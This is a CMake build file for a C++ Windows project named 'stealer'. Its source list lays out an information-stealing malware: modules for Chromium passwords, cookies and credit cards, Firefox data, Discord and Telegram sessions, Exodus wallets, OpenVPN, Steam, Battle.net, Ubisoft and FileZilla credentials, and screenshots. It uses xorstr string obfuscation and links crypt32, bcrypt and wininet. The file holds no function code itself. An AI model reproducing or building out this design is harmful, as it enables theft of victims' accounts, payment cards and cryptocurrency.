cmake_minimum_required(VERSION 3.28)
project(stealer)

set(CMAKE_CXX_STANDARD 20)
#set(CMAKE_EXE_LINKER_FLAGS "-static")

include_directories(include)
link_directories(include)

add_executable(stealer src/main.cpp
        src/stealer/Stealer.cpp
        src/stealer/Stealer.h
        src/stealer/StealerModule.h
        src/Includes.h
        src/utils/Utils.cpp
        src/utils/Utils.h
        src/stealer/impl/Screenshot.cpp
        src/stealer/impl/Screenshot.h
        include/xorstr.hpp
        src/stealer/impl/socials/Socials.cpp
        src/stealer/impl/socials/Socials.h
        src/stealer/impl/socials/impl/Discord.cpp
        src/stealer/impl/socials/impl/Discord.h
        include/json.hpp
        src/utils/StringUtil.cpp
        src/utils/StringUtil.h
        src/utils/HttpUtil.cpp
        src/utils/HttpUtil.h
        src/stealer/impl/socials/impl/Telegram.cpp
        src/stealer/impl/socials/impl/Telegram.h
        src/stealer/impl/files/Files.cpp
        src/stealer/impl/files/Files.h
        src/stealer/impl/Info.cpp
        src/stealer/impl/Info.h
        src/utils/OSUtil.cpp
        src/utils/OSUtil.h
        src/stealer/impl/Processes.cpp
        src/stealer/impl/Processes.h
        src/stealer/impl/crypto/Crypto.cpp
        src/stealer/impl/crypto/Crypto.h
        src/stealer/impl/crypto/impl/Exodus.cpp
        src/stealer/impl/crypto/impl/Exodus.h
        src/stealer/impl/vpns/VPNs.cpp
        src/stealer/impl/vpns/VPNs.h
        src/stealer/impl/vpns/impl/OpenVPN.cpp
        src/stealer/impl/vpns/impl/OpenVPN.h
        src/stealer/impl/games/Games.cpp
        src/stealer/impl/games/Games.h
        src/stealer/impl/games/impl/Steam.cpp
        src/stealer/impl/games/impl/Steam.h
        src/utils/chromuim/ChromiumUtil.cpp
        src/utils/chromuim/ChromiumUtil.h
        src/utils/Base64Util.cpp
        src/utils/Base64Util.h
        include/sqlite3.c
        include/sqlite3.h
        src/stealer/impl/games/impl/BattleNet.cpp
        src/stealer/impl/games/impl/BattleNet.h
        src/stealer/impl/games/impl/UbisoftConnect.cpp
        src/stealer/impl/games/impl/UbisoftConnect.h
        src/stealer/StealerModuleGroup.h
        src/stealer/impl/InstalledApps.cpp
        src/stealer/impl/InstalledApps.h
        include/pugiconfig.hpp
        include/pugixml.cpp
        include/pugixml.hpp
        src/stealer/impl/FileZilla.cpp
        src/stealer/impl/FileZilla.h
        src/utils/FilesUtil.cpp
        src/utils/FilesUtil.h
        src/stealer/impl/browsers/chromium/ChromiumBrowsers.cpp
        src/stealer/impl/browsers/chromium/ChromiumBrowsers.h
        src/stealer/impl/browsers/chromium/impl/CHistory.cpp
        src/stealer/impl/browsers/chromium/impl/CHistory.h
        src/stealer/impl/browsers/BrowserModule.h
        src/stealer/impl/browsers/chromium/impl/CCreditCards.cpp
        src/stealer/impl/browsers/chromium/impl/CCreditCards.h
        src/stealer/impl/browsers/chromium/impl/CDownloads.cpp
        src/stealer/impl/browsers/chromium/impl/CDownloads.h
        src/stealer/impl/browsers/chromium/impl/CPasswords.cpp
        src/stealer/impl/browsers/chromium/impl/CPasswords.h
        src/stealer/impl/browsers/chromium/ChromiumBrowserModule.h
        src/stealer/impl/browsers/chromium/impl/CBookmarks.cpp
        src/stealer/impl/browsers/chromium/impl/CBookmarks.h
        src/stealer/impl/browsers/chromium/impl/CAutoFill.cpp
        src/stealer/impl/browsers/chromium/impl/CAutoFill.h
        src/stealer/impl/browsers/chromium/impl/CCookies.cpp
        src/stealer/impl/browsers/chromium/impl/CCookies.h
        include/binaryhandler.hpp
        src/stealer/impl/browsers/entity/Cookie.h
        src/stealer/impl/browsers/entity/Login.h
        src/stealer/impl/browsers/entity/AutoFill.h
        src/stealer/impl/browsers/entity/History.h
        src/stealer/impl/browsers/entity/Download.h
        src/stealer/impl/browsers/entity/CreditCard.h
        src/stealer/impl/browsers/entity/SharedEntity.h
        src/stealer/impl/browsers/firefox/FirefoxBrowsers.cpp
        src/stealer/impl/browsers/firefox/FirefoxBrowsers.h
        src/stealer/impl/browsers/firefox/FirefoxBrowserModule.h
        src/stealer/impl/browsers/firefox/impl/FBookmarks.cpp
        src/stealer/impl/browsers/firefox/impl/FBookmarks.h
        src/stealer/impl/browsers/entity/Entity.h
        src/stealer/impl/browsers/entity/Bookmark.h
        src/utils/SQLiteUtil.cpp
        src/utils/SQLiteUtil.h
)

target_link_libraries(stealer
        crypt32
        bcrypt
        wininet
        wbemuuid
)

if(CMAKE_BUILD_TYPE STREQUAL "Release")
    add_definitions(-DDEV=false)
else()
    add_definitions(-DDEV=true)
endif()